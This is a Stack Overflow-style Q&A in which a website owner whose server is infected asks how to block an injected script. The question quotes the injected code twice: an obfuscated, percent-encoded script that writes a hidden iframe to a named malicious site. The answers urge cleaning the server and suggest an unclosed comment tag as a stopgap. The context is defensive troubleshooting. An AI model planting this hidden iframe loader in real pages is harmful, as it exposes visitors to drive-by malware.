# Programatically stopping a specific chunk of code in html/javascript/css

Tags: javascript, html, css, antivirus

The server that has my website on it also has a virus on it.

The virus injects the malicious code

```
<b id="BAs"></b><script>/*Warning: Opera Only*/var hKo = document.createElement("script");hKo.text="document.write(unescape(\"%3c%69%66%72%61%6d%65%20%73%72%63%3d%27%68%74%74%70%3a%2f%2f%6e%63%63%63%6e%6e%6e%63%2e%63%6e%2f%69%6d%67%2f%69%6e%64%65%78%2e%70%68%70%27%20%73%74%79%6c%65%3d%27%64%69%73%70%6c%61%79%3a%6e%6f%6e%65%3b%27%3e%3c%2f%69%66%72%61%6d%65%3e\"));";document.getElementById("BAs").appendChild(hKo)</script>
```

onto EVERY single page which is served, and it is being preprocessed by Apache or something similar to add it to the end of the file.

I created a test file, with the following code:

```
<html> 
<head> 
<title>Test HTML File</title> 
</head> 
<body> 
<h1>Test HTML File</h1> 
</body>
</html>
```

It isn't pretty, but it served its purpose.

When viewing the page in my browser, I get

```
<html> 
<head> 
<title>Test HTML File</title> 
</head> 
<body> 
<h1>Test HTML File</h1> 
<b id="BAs"></b><script>/*Warning: Opera Only*/var hKo = document.createElement("script");hKo.text="document.write(unescape(\"%3c%69%66%72%61%6d%65%20%73%72%63%3d%27%68%74%74%70%3a%2f%2f%6e%63%63%63%6e%6e%6e%63%2e%63%6e%2f%69%6d%67%2f%69%6e%64%65%78%2e%70%68%70%27%20%73%74%79%6c%65%3d%27%64%69%73%70%6c%61%79%3a%6e%6f%6e%65%3b%27%3e%3c%2f%69%66%72%61%6d%65%3e\"));";document.getElementById("BAs").appendChild(hKo)</script> 
</body> 
</html>
```

which can be viewed from www.sagamountain.com/testfile.html (warning, this page is infected)

I need to programmatically stop that div and that script from executing, as it is an iframe to a site with a trojan on it. HTML, CSS, or JS, I just need some way to prevent that JS from executing.

It is already display:none so you cannot see it, but how can I prevent the iframe from ever loading at all?

Thanks for the help! The unescape thing resolves to an iframe to http://ncccnnnc.cn/img/index.php which is clearly the source of my troubles. Don't go to that site!

EDIT: This is a followup to https://serverfault.com/questions/78439/my-website-is-infected-i-restored-a-backup-of-the-uninfected-files-how-long-wil/78459#78459

Comment: Wait, your server is infected?  How about cleaning that up?  It'll have the nice side-effect of removing the IFRAME from your pages.

Comment: ...and your server is, apparently, still reachable on the net...

Comment: I cannot access any of the server files.

Answer (score 11, accepted):

I'm sorry that I can't answer your specific question, but I think that you're looking at this the wrong way. What you *need* to do is *not* strip out the virus-inserted html, what you *need* to do is talk to your web-host/sysadmin and strip out the *virus*.

Treating the symptoms won't cure the infection. *Treating the disease*, however, will also treat the symptoms as well as removing the virus.

Comment: What should I tell them to do?

Comment: Tell them to a. Take the server offline, and b. review the material Google's sent you, and perform the necessary steps to remove the infection.

Comment: Google did not send me any material, and webmaster tools' malware info thing shows nothing at this time. I've told them to take the server offline already, but they don't want to shut it down.

Comment: This is a question better answered back on ServerFault.  In your original question, you say (in a comment to one of the answers) that your server is still infected.  How do you know this?  Contact your provider with this information.

Comment: I know that it is still infected, since all pages have that JS at the bottom. When editing the files themselves, the JS is not present which leads me to believe that the server is still infected.

Comment: @Cyclone, out of curiosity, did you resolve your question in the end?

Comment: @David Thomas I apologize for the latency in this, but yes, it was resolved. Thanks for the reminder to check back!

Comment: @Cyclone, no worries; I was just wondering how it turned out; but thank you for the accept..! =)

Answer (score 2):

The file that is in your server is a php file look in the comments [here](http://blog.unmaskparasites.com/2009/10/15/ncccnnnc-cn-warning-not-opera-only/).

Answer (score 2):

Cyber, if you have to wait on the server to be fixed by someone else, I'd say you should try ending your documents with an open `<noscript>` tag or open HTML comment tag.

You can't use Javascript to stop content that hasn't been rendered from doing so, unless you use `document.write` and one of the above tags (noscript/comment). Also you can't do anything by placing a script after, as it is already too late (the content is there already).

It is an ugly solution but should prevent your site visitors from experiencing the virus. It also makes your markup invalid, but any browser should be able to parse it and render it as you expect.

Best of luck with the server!

Comment: That was genius, I just added <!-- before </body> and it took care of it until it can be fixed.